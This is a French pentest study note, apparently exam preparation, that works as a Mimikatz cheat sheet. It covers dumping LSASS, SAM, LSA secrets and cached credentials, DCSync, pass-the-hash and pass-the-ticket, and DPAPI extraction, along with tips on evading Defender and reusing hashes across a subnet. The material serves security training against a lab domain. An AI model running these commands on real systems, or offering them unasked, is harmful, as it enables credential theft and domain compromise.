Whackermelon
notes / elevation-de-privileges / enumeration-manuelle / enumeration-windows / mimikatz-dump-de-credentials

Mimikatz — dump de credentials

sommaire

Prérequis & lancement

Nécessite des droits admin (idéalement SYSTEM) + le privilège debug. Windows Defender le détecte/quarantaine dès l’écriture sur disque : prévoir exclusion, exécution en mémoire, ou les alternatives (pypykatz, dump comsvcs.dll — voir fiche Privesc Windows).

.\mimikatz.exe                                # mode interactif
mimikatz # privilege::debug                # OBLIGATOIRE avant tout
mimikatz # log mimi.log                    # tout logger dans un fichier
mimikatz # token::elevate                  # tenter de passer SYSTEM
# one-liner (pratique en shell non interactif / via SSH) :
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" 

Dump mémoire LSASS

sekurlsa::logonpasswords     # creds en clair / hash NTLM des sessions ouvertes
sekurlsa::wdigest            # mots de passe en clair (si WDigest actif)
sekurlsa::tickets /export    # tickets Kerberos -> fichiers .kirbi
sekurlsa::ekeys              # cles de chiffrement (aes, rc4, des)
kerberos::list               # tickets de l'utilisateur courant

SAM / LSA / Active Directory

lsadump::sam                        # hash locaux (SAM)
lsadump::secrets                    # secrets LSA (creds de services...)
lsadump::cache                      # logons domaine en cache (MSCASHv2)
# DCSync : dump n'importe quel hash du domaine (droits de replication requis)
lsadump::dcsync /user:krbtgt
lsadump::dcsync /domain:LAB.LOCAL /user:Administrateur

Réutilisation des creds (PtH / PtT)

# Pass-the-Hash : ouvre un processus avec le hash injecte
sekurlsa::pth /user:Administrateur /domain:LAB.LOCAL /ntlm:<HASH> /run:cmd.exe
# Pass-the-Ticket : injecter un .kirbi exporte
kerberos::ptt ticket.kirbi
kerberos::purge                     # vider le cache tickets avant injection

DPAPI & vault

sekurlsa::dpapi                                 # masterkeys en memoire
dpapi::masterkey /in:"C:\...\masterkey" /rpc  # dechiffrer via le DC
vault::list                                     # gestionnaire d'identifiants
vault::cred

Tips examen

• Un hash NTLM récupéré → le tester direct en PtH (nxc smb sur tout le subnet) avant de le casser (hashcat -m 1000). • DCSync : pas besoin de shell sur le DC, juste les droits « Replicating Directory Changes » (DA par défaut). • Toujours logger (log mimi.log), rapatrier le fichier et grep — la sortie est longue. • Credential Guard / LSASS protégé (RunAsPPL) → le dump mémoire échoue : viser SAM, DPAPI, tickets. • Un .exe mimikatz déposé peut disparaître (quarantaine) : vérifier sa présence après upload.